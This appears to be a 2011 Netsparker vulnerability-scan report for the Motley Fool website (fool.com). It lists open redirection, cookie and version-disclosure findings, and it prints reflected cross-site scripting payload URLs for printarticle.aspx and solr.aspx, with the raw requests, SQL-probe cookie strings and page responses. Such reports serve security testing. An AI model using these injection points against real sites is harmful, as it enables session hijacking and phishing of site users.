Reflected XSS, DORK, fool.com REPORT SUMMARY

Netsparker - Scan Report Summary

TARGET URL	http://www.fool.com/
SCAN DATE	4/21/2011 7:26:42 AM
REPORT DATE	4/21/2011 9:01:56 AM
SCAN DURATION	00:20:25

Total Requests

Average Speed

req/sec.

identified

confirmed

critical

informational

GHDB, DORK Tests

PROFILE	Previous Settings
ENABLED ENGINES	Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting

Authentication

Scheduled

VULNERABILITIES Vulnerabilities
	IMPORTANT 31 % MEDIUM 6 % LOW 25 % INFORMATION 38 %

GHDB, DORK VULNERABILITIES

URL	Parameter	Method	Vulnerability	Confirmed
/			ASP.NET Version Disclosure	No
/Account/			Cookie Not Marked As Secure	Yes
/adtr.ashx	to	GET	Open Redirection	Yes
/common/pages/waf/wafblocked.aspx	i	GET	Basic Authorization Required	Yes
/fool/free-report/15/rb-billgates-displayexternal-68077.aspx	aid	GET	Internal Server Error	Yes
/help/index.htm			Redirect Response BODY Is Too Large	Yes
/Landing/			Forbidden Resource	Yes
/Landing/TMF/Registration.aspx			ViewState is not Encrypted	No
/press/about.htm			E-mail Address Disclosure	No
/robots.txt			Cookie Not Marked As HttpOnly	Yes
			IIS Version Disclosure	No
			Robots.txt Identified	Yes
/search/solr.aspx	source	GET	Cross-site Scripting	No
	sort	GET	Cross-site Scripting	No
	source	GET	Cross-site Scripting	No
/Server/printarticle.aspx	File	GET	Cross-site Scripting	Yes

Cross-site Scripting

4 TOTAL

IMPORTANT

CONFIRMED

XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Hi-jacking users' active session
Changing the look of the page within the victims browser.
Mounting a successful phishing attack.
Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /Server/printarticle.aspx

/Server/printarticle.aspx CONFIRMED

http://www.fool.com/Server/printarticle.aspx?File=/%22%20stYle=%22x:expre/**/ssion(alert(9))

Parameters

Parameter	Type	Value
File	GET	/" stYle="x:expre/**/ssion(alert(9))

Request

GET /Server/printarticle.aspx?File=/%22%20stYle=%22x:expre/**/ssion(netsparker(9)) HTTP/1.1
Referer: http://www.fool.com/Server/FoolPrint.asp?File=/press/about.htm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fool.com
Cookie: Sookie=source=data:&fy=false&ybls=1; Wookie=Ref=http%3A%2F%2Fwww%2Efool%2Ecom%2Ffoolwatch%2Ffoolwatch%2Easpx; Fool=V=5&R=false&Uid=1561337428&Username=; Sookie=source=data:&fy=false&ybls=1; Wookie=Ref=http%3A%2F%2Fwww%2Efool%2Ecom%2Ffoolwatch%2Ffoolwatch%2Easpx; Tookie=T=08714060758011203518233276325374; v1st=752887E25915516F; Fool=V=5&R=false&Uid=1561337428&Username=; (CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))&fy=false&ybls=1; TlM3NzU0NTYxNDQ2NTc1&fy=false&ybls=0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

- /search/solr.aspx

/search/solr.aspx

http://www.fool.com/search/solr.aspx?q=Enter+Keywords+or+Ticker&source=%27%22%20ns=%20alert(0x000BAB..

Parameters

Parameter	Type	Value
q	GET	Enter Keywords or Ticker
source	GET	'" ns= alert(0x000BAB)

Request

GET /search/solr.aspx?q=Enter+Keywords+or+Ticker&source=%27%22%20ns=%20netsparker(0x000BAB)%20 HTTP/1.1
Referer: http://www.fool.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fool.com
Cookie: Sookie=source=data:; Sookie=bm=&source=; Wookie=Ref=http%3A%2F%2Fwww%2Efool%2Ecom%2FLanding%2FTMF%2FRegistration%2Easpx; Sookie=source=&fy=false&ybls=0; Wookie=Ref=http%3A%2F%2Fwww%2Efool%2Ecom%2FLanding%2FTMF%2FRegistration%2Easpx; Tookie=T=05571871421144572323748545070000; v1st=2AA895FEC98CE334; Fool=Uid=1561335380&Username=&V=5&DesktopPreference=false&R=false; (CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))&fy=false&ybls=1; TlM3NzU0NTYxNDQ2NTc1&fy=false&ybls=1
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
P3P: policyref="http://www.fool.com/w3c/p3p.xml", CP="IDC DSP COR CUR ADMa DEVa TAIa CONo HISa TELo OUR PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE LOC IND"
Set-Cookie: Sookie=source=data:&fy=false&ybls=0; domain=.fool.com; path=/,Tookie=T=05571871421144572323748545070000; domain=.fool.com; expires=Sun, 18-Apr-2021 04:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Apr 2011 12:32:10 GMT
Content-Encoding:
Transfer-Encoding: chunked

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head><title>
Searching for: Enter Keywords or Ticker | Fool.com | Stock Investing Advice | Stock Research
</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><meta property="fb:app_id" content="50808187550" /> <meta http-equiv="imagetoolbar" content="no" /> <link rel="image_src" href="http://g.foolcdn.com/art/ratings/avatars/img_194.gif" /> <link href="http://s.foolcdn.com/common/css/fool.css?v=83256" rel="stylesheet" type="text/css" media="all" /> <link href="http://s.foolcdn.com/common/css/Usmf.css?v=83256" rel="stylesheet" type="text/css" media="all" /> <link href="http://s.foolcdn.com/common/css/Bridge.css?v=83256" rel="stylesheet" type="text/css" media="all" /> <link href="http://s.foolcdn.com/common/css/Search.css?v=83256" rel="stylesheet" type="text/css" media="all" />
<script type='text/javascript'>
var isUserNameCreated = false;
var isLoggedIn = false;
var hasUserName = false;
var isRegistered = false;
</script><script src="http://j.foolcdn.com/common/js/prototype_fool.min.js?v=83256" type="text/javascript"></script> <script src="http://j.foolcdn.com/common/js/fx_usmf.min.js?v=83256" type="text/javascript"></script>  <script src="http://j.foolcdn.com/common/js/Ajax/rsh.min.js?v=83256" type="text/javascript"></script> <script src="http://j.foolcdn.com/common/js/Search/Search.js?v=83256" type="text/javascript"></script> <script src="http://j.foolcdn.com/common/js/Search/Search.Faceted.js?v=83256" type="text/javascript"></script> <script type="text/javascript"> window.dhtmlHistory.create({ toJSON: function(o) { return Object.toJSON(o); } , fromJSON: function(s) { return s.evalJSON(); } }); </script> </head> <body id="ctl01_ctl00_cphContent_Body"> <div id="header" class="navCellA"> <div id="tophat" class="clearfix">
<div class="grid">
<div id="tophatWrap">
<div id="navigation" class="clearfix">
<a class="qsAdd qs-source-iflsittph0000001" href="http://www.fool.com/"><span class="fool">Fool.com</span></a>
<span id="quips">The World's Greatest Investing Community</span>
</div>
<div id="userTools">
<span id="welcome">Welcome!</span>
<ul id="premium" class="dropMenu">
<li class="topLevel"><a href="/shop/newsletters/index.aspx" class="qsAdd qs-source-ipesittph0000001"><span><span>Premium Advice</span></span></a><ul>
<li class="info subhead"><strong>My Services</strong></li>
<li class="info">None</li>
<li class="info subhead"><strong>Other Services</strong></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/1414/">Alpha</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/1399/">Big Short</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/1255/">Duke Street</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/25/">Global Gains</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/04/">Hidden Gems</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/08/">Income Investor</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/14/">Inside Value</a></li>
<li><a class="qsAdd qs-source-idpsithat0000002" href="http://newsletters.fool.com/30/">Million Dollar Portfolio</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/50/">Motley Fool Options</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/1228/">Motley Fool Pro</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/15/">Rule Breakers</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/13/">Rule Your Retirement</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/52/">Special Ops</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002 last" href="http://newsletters.fool.com/18/">Stock Advisor</a></li>
</ul>
</li>
</ul>

<span id="Help"><a class="qsAdd qs-source-ihesittph0000001" href="/help/index.htm">Help</a></span>
<span id="join"><a class="qsAdd qs-source-ijnsittph0000001" href="/Landing/TMF/Registration.aspx">Join Now</a></span>
<span>or</span>
<span id="login"><a class="qsAdd qs-source-ilgsittph0000001" href="https://www.fool.com/secure/login.aspx">Login</a></span>
</div>
</div>
</div><script type="text/javascript">Fool.Util.PseudoClass.hover('#tophatWrap li.topLevel');</script></div><div id="topnav"><div class="grid">

<div id="logo"><a class="qsAdd qs-source-illsitima0000001" href="http://www.fool.com/">The Motley Fool
</a></div>
<form id="searchForm" method="get" action="/search/solr.aspx"><fieldset id="search"><input class="query" value="Enter Keywords or Ticker" type="text" name="q" maxlength="100" /><input type="hidden" name="source" value="ignsittn0000001" /><input id="commandSearch" class="btn doSearch" type="submit" /></fieldset></form>
<div id="menu" class="grid clearfix"><div class="column span-25"><ul class="clearfix">
<li class="qsAdd qs-source-iflsittph0000001 on"><a href="http://www.fool.com/" class="qsAdd qs-source-iflsittph0000001"><span>Home</span></a>
<ul>
<li class="qsAdd qs-source-ifltnvsnv0000001 foolwatch"><a href="/foolwatch/foolwatch.aspx" class="qsAdd qs-source-ifltnvsnv0000001 foolwatch">All Fool Headlines</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://wiki.fool.com/Fool_Labs" class="qsAdd qs-source-ifltnvsnv0000001">Fool Labs</a></li>

<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://military.fool.com/" class="qsAdd qs-source-ifltnvsnv0000001">Fool Military</a></li>
<li class="last qsAdd qs-source-ifltnvsnv0000001"><a href="/press/about.htm" class="last qsAdd qs-source-ifltnvsnv0000001">About The Motley Fool</a></li>
</ul>
</li>
<li class="qsAdd qs-source-ipesittph0000001"><a href="http://my.fool.com/" class="qsAdd qs-source-ipesittph0000001"><span>My Fool</span></a>
<ul>
<li class="qsAdd qs-source-ipesitlnk0000001"><a href="https://my.fool.com/Profile" class="qsAdd qs-source-ipesitlnk0000001">My Profile</a></li>
<li class="qsAdd qs-source-ipesitlnk0000001"><a href="http://my.fool.com/watchlist" class="qsAdd qs-source-ipesitlnk0000001">My Watchlist</a></li>
<li class="qsAdd qs-source-ipesitlnk0000001"><a href="http://boards.fool.com/FavoriteBoards.asp?" class="qsAdd qs-source-ipesitlnk0000001">My Boards</a></li>
<li class="qsAdd qs-source-ipesitlnk0000001"><a href="http://caps.fool.com/MyPlayer.aspx" class="qsAdd qs-source-ipesitlnk0000001">My CAPS</a></li>
<li class="qsAdd qs-source-ipesitlnk0000001"><a href="http://my.fool.com/#my-reports" class="qsAdd qs-source-ipesitlnk0000001">My Reports</a></li>
<li class="last qsAdd qs-source-ipesitlnk0000001"><a href="https://www.fool.com/Account/Index.aspx" class="last qsAdd qs-source-ipesitlnk0000001">My Settings</a></li>
</ul>
</li>
<li class="qsAdd qs-source-ifltnvpnv0000001"><a href="/how-to-invest/index.aspx" class="qsAdd qs-source-ifltnvpnv0000001"><span>How To Invest</span></a>
<ul>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/how-to-invest/thirteen-steps/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">13 Steps</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/how-to-invest/broker/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Find a Broker</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://wiki.fool.com/" class="qsAdd qs-source-ifltnvsnv0000001">Investing Wiki</a></li>
<li class=" last qsAdd qs-source-ifltnvsnv0000001"><a href="/how-to-invest/personal-finance/index.aspx" class=" last qsAdd qs-source-ifltnvsnv0000001">Personal Finance</a></li>
</ul>
</li>
<li class="qsAdd qs-source-ifltnvpnv0000001"><a href="/investing/index.aspx" class="qsAdd qs-source-ifltnvpnv0000001"><span>Investing Commentary</span></a>
<ul>
<li class="qsAdd qs-source-ifltnvpnv0000001"><a href="/investing/basics/index.aspx" class="qsAdd qs-source-ifltnvpnv0000001">Basics</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/investing/etf/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">ETFs</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/investing/options/options-a-foolish-introduction.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Options</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/investing/small-cap/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Small-Cap</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/investing/dividends-income/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Dividends & Income</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/investing/high-growth/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">High Growth</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/investing/value/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Value</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/mutualfunds/mutualfunds.htm" class="qsAdd qs-source-ifltnvsnv0000001">Mutual Funds</a></li>
<li class="last qsAdd qs-source-ifltnvsnv0000001"><a href="/investing/international/index.aspx" class="last qsAdd qs-source-ifltnvsnv0000001">International</a></li>
</ul>
</li>
<li class="capsTab qsAdd qs-source-ifltnvpnv0000001"><a href="http://caps.fool.com/index.aspx" class="capsTab qsAdd qs-source-ifltnvpnv0000001"><span>CAPS Community</span></a>
<ul>
<li class="capsHome qsAdd qs-source-icasitlnk0000006"><a href="http://caps.fool.com/" class="capsHome qsAdd qs-source-icasitlnk0000006">CAPS Home</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/" class="qsAdd qs-source-ifltnvsnv0000001">CAPS Home</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/MyPlayer.aspx" class="qsAdd qs-source-ifltnvsnv0000001">My CAPS</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/TickerRankings.aspx?filter=7&sortcol=38&sortdir=1" class="qsAdd qs-source-ifltnvsnv0000001">Stocks</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/Screener.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Screener</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/PlayerRankings.aspx?filter=20&sortcol=5&sortdir=1" class="qsAdd qs-source-ifltnvsnv0000001">Players</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/Blogs/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Blogs</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/Stats.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Top Tens</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/TagRankings.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Tags</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/Contests.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Contests</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/FeedBack.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Contact Us</a></li>
<li class="last qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/Help.aspx" class="last qsAdd qs-source-ifltnvsnv0000001">Help</a></li>
</ul>
</li>
<li class="qsAdd qs-source-ifltnvpnv0000001"><a href="/retirement/index.aspx" class="qsAdd qs-source-ifltnvpnv0000001"><span>Retirement</span></a>
<ul>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/retirement/general/how-to-retire-in-style.aspx" class="qsAdd qs-source-ifltnvsnv0000001">13 Retirement Steps</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/retirement/ira/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">IRAs</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/retirement/401k/401kintro-is-your-retirement-plan-foolish.aspx" class="qsAdd qs-source-ifltnvsnv0000001">401(k)s, Etc.</a></li>
<li class="last qsAdd qs-source-ifltnvsnv0000001"><a href="/retirement/assetallocation/introduction-to-asset-allocation.aspx" class="last qsAdd qs-source-ifltnvsnv0000001">Asset Allocation</a></li>
</ul>
</li>
<li class="qsAdd qs-source-ifltnvpnv0000001"><a href="http://boards.fool.com/" class="qsAdd qs-source-ifltnvpnv0000001"><span>Boards</span></a>
<ul>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://boards.fool.com/BestOf.asp" class="qsAdd qs-source-ifltnvsnv0000001">Best Of</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://boards.fool.com/favoriteboards.asp" class="qsAdd qs-source-ifltnvsnv0000001..

- /search/solr.aspx

/search/solr.aspx

http://www.fool.com/search/solr.aspx?sort=%27%22%20ns=%20alert(0x0010B4)%20&source=isesitlnk0000006

Parameters

Parameter	Type	Value
sort	GET	'" ns= alert(0x0010B4)
source	GET	isesitlnk0000006

Request

GET /search/solr.aspx?sort=%27%22%20ns=%20netsparker(0x0010B4)%20&source=isesitlnk0000006 HTTP/1.1
Referer: http://www.fool.com/search/solr.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fool.com
Cookie: Sookie=source=data:; Sookie=source=data:&fy=false&ybls=1; Wookie=Ref=http%3A%2F%2Fwww%2Efool%2Ecom%2FLanding%2FTMF%2FRegistration%2Easpx; Sookie=source=data:&fy=false&ybls=0; Wookie=Ref=https%3a%2f%2fwww.fool.com%2fimg%2ftopnav%2fidc.gif; Tookie=T=22247546751715524568024772648556; v1st=603F0287C00EBEB4; Fool=Uid=1561337054&Username=&V=5&DesktopPreference=false&R=false; (CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))&fy=false&ybls=1; TlM3NzU0NTYxNDQ2NTc1&fy=false&ybls=0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
P3P: policyref="http://www.fool.com/w3c/p3p.xml", CP="IDC DSP COR CUR ADMa DEVa TAIa CONo HISa TELo OUR PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE LOC IND"
Set-Cookie: Sookie=source=data:&fy=false&ybls=0; domain=.fool.com; path=/,Tookie=T=22247546751715524568024772648556; domain=.fool.com; expires=Sun, 18-Apr-2021 04:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Apr 2011 12:39:19 GMT
Content-Encoding:
Transfer-Encoding: chunked

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head><title>
Searching for: | Fool.com | Stock Investing Advice | Stock Research
</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><meta property="fb:app_id" content="50808187550" /> <meta http-equiv="imagetoolbar" content="no" /> <link rel="image_src" href="http://g.foolcdn.com/art/ratings/avatars/img_194.gif" /> <link href="http://s.foolcdn.com/common/css/fool.css?v=83256" rel="stylesheet" type="text/css" media="all" /> <link href="http://s.foolcdn.com/common/css/Usmf.css?v=83256" rel="stylesheet" type="text/css" media="all" /> <link href="http://s.foolcdn.com/common/css/Bridge.css?v=83256" rel="stylesheet" type="text/css" media="all" /> <link href="http://s.foolcdn.com/common/css/Search.css?v=83256" rel="stylesheet" type="text/css" media="all" />
<script type='text/javascript'>
var isUserNameCreated = false;
var isLoggedIn = false;
var hasUserName = false;
var isRegistered = false;
</script><script src="http://j.foolcdn.com/common/js/prototype_fool.min.js?v=83256" type="text/javascript"></script> <script src="http://j.foolcdn.com/common/js/fx_usmf.min.js?v=83256" type="text/javascript"></script>  <script src="http://j.foolcdn.com/common/js/Ajax/rsh.min.js?v=83256" type="text/javascript"></script> <script src="http://j.foolcdn.com/common/js/Search/Search.js?v=83256" type="text/javascript"></script> <script src="http://j.foolcdn.com/common/js/Search/Search.Faceted.js?v=83256" type="text/javascript"></script> <script type="text/javascript"> window.dhtmlHistory.create({ toJSON: function(o) { return Object.toJSON(o); } , fromJSON: function(s) { return s.evalJSON(); } }); </script> </head> <body id="ctl01_ctl00_cphContent_Body"> <div id="header" class="navCellA"> <div id="tophat" class="clearfix">
<div class="grid">
<div id="tophatWrap">
<div id="navigation" class="clearfix">
<a class="qsAdd qs-source-iflsittph0000001" href="http://www.fool.com/"><span class="fool">Fool.com</span></a>
<span id="quips">The World's Greatest Investing Community</span>
</div>
<div id="userTools">
<span id="welcome">Welcome!</span>
<ul id="premium" class="dropMenu">
<li class="topLevel"><a href="/shop/newsletters/index.aspx" class="qsAdd qs-source-ipesittph0000001"><span><span>Premium Advice</span></span></a><ul>
<li class="info subhead"><strong>My Services</strong></li>
<li class="info">None</li>
<li class="info subhead"><strong>Other Services</strong></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/1414/">Alpha</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/1399/">Big Short</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/1255/">Duke Street</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/25/">Global Gains</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/04/">Hidden Gems</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/08/">Income Investor</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/14/">Inside Value</a></li>
<li><a class="qsAdd qs-source-idpsithat0000002" href="http://newsletters.fool.com/30/">Million Dollar Portfolio</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/50/">Motley Fool Options</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/1228/">Motley Fool Pro</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/15/">Rule Breakers</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/13/">Rule Your Retirement</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/52/">Special Ops</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002 last" href="http://newsletters.fool.com/18/">Stock Advisor</a></li>
</ul>
</li>
</ul>

<span id="Help"><a class="qsAdd qs-source-ihesittph0000001" href="/help/index.htm">Help</a></span>
<span id="join"><a class="qsAdd qs-source-ijnsittph0000001" href="/Landing/TMF/Registration.aspx">Join Now</a></span>
<span>or</span>
<span id="login"><a class="qsAdd qs-source-ilgsittph0000001" href="https://www.fool.com/secure/login.aspx">Login</a></span>
</div>
</div>
</div><script type="text/javascript">Fool.Util.PseudoClass.hover('#tophatWrap li.topLevel');</script></div><div id="topnav"><div class="grid">

<div id="logo"><a class="qsAdd qs-source-illsitima0000001" href="http://www.fool.com/">The Motley Fool
</a></div>
<form id="searchForm" method="get" action="/search/solr.aspx"><fieldset id="search"><input class="query" value="Enter Keywords or Ticker" type="text" name="q" maxlength="100" /><input type="hidden" name="source" value="ignsittn0000001" /><input id="commandSearch" class="btn doSearch" type="submit" /></fieldset></form>
<div id="menu" class="grid clearfix"><div class="column span-25"><ul class="clearfix">
<li class="qsAdd qs-source-iflsittph0000001 on"><a href="http://www.fool.com/" class="qsAdd qs-source-iflsittph0000001"><span>Home</span></a>
<ul>
<li class="qsAdd qs-source-ifltnvsnv0000001 foolwatch"><a href="/foolwatch/foolwatch.aspx" class="qsAdd qs-source-ifltnvsnv0000001 foolwatch">All Fool Headlines</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://wiki.fool.com/Fool_Labs" class="qsAdd qs-source-ifltnvsnv0000001">Fool Labs</a></li>

<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://military.fool.com/" class="qsAdd qs-source-ifltnvsnv0000001">Fool Military</a></li>
<li class="last qsAdd qs-source-ifltnvsnv0000001"><a href="/press/about.htm" class="last qsAdd qs-source-ifltnvsnv0000001">About The Motley Fool</a></li>
</ul>
</li>
<li class="qsAdd qs-source-ipesittph0000001"><a href="http://my.fool.com/" class="qsAdd qs-source-ipesittph0000001"><span>My Fool</span></a>
<ul>
<li class="qsAdd qs-source-ipesitlnk0000001"><a href="https://my.fool.com/Profile" class="qsAdd qs-source-ipesitlnk0000001">My Profile</a></li>
<li class="qsAdd qs-source-ipesitlnk0000001"><a href="http://my.fool.com/watchlist" class="qsAdd qs-source-ipesitlnk0000001">My Watchlist</a></li>
<li class="qsAdd qs-source-ipesitlnk0000001"><a href="http://boards.fool.com/FavoriteBoards.asp?" class="qsAdd qs-source-ipesitlnk0000001">My Boards</a></li>
<li class="qsAdd qs-source-ipesitlnk0000001"><a href="http://caps.fool.com/MyPlayer.aspx" class="qsAdd qs-source-ipesitlnk0000001">My CAPS</a></li>
<li class="qsAdd qs-source-ipesitlnk0000001"><a href="http://my.fool.com/#my-reports" class="qsAdd qs-source-ipesitlnk0000001">My Reports</a></li>
<li class="last qsAdd qs-source-ipesitlnk0000001"><a href="https://www.fool.com/Account/Index.aspx" class="last qsAdd qs-source-ipesitlnk0000001">My Settings</a></li>
</ul>
</li>
<li class="qsAdd qs-source-ifltnvpnv0000001"><a href="/how-to-invest/index.aspx" class="qsAdd qs-source-ifltnvpnv0000001"><span>How To Invest</span></a>
<ul>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/how-to-invest/thirteen-steps/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">13 Steps</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/how-to-invest/broker/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Find a Broker</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://wiki.fool.com/" class="qsAdd qs-source-ifltnvsnv0000001">Investing Wiki</a></li>
<li class=" last qsAdd qs-source-ifltnvsnv0000001"><a href="/how-to-invest/personal-finance/index.aspx" class=" last qsAdd qs-source-ifltnvsnv0000001">Personal Finance</a></li>
</ul>
</li>
<li class="qsAdd qs-source-ifltnvpnv0000001"><a href="/investing/index.aspx" class="qsAdd qs-source-ifltnvpnv0000001"><span>Investing Commentary</span></a>
<ul>
<li class="qsAdd qs-source-ifltnvpnv0000001"><a href="/investing/basics/index.aspx" class="qsAdd qs-source-ifltnvpnv0000001">Basics</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/investing/etf/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">ETFs</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/investing/options/options-a-foolish-introduction.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Options</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/investing/small-cap/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Small-Cap</a></li>
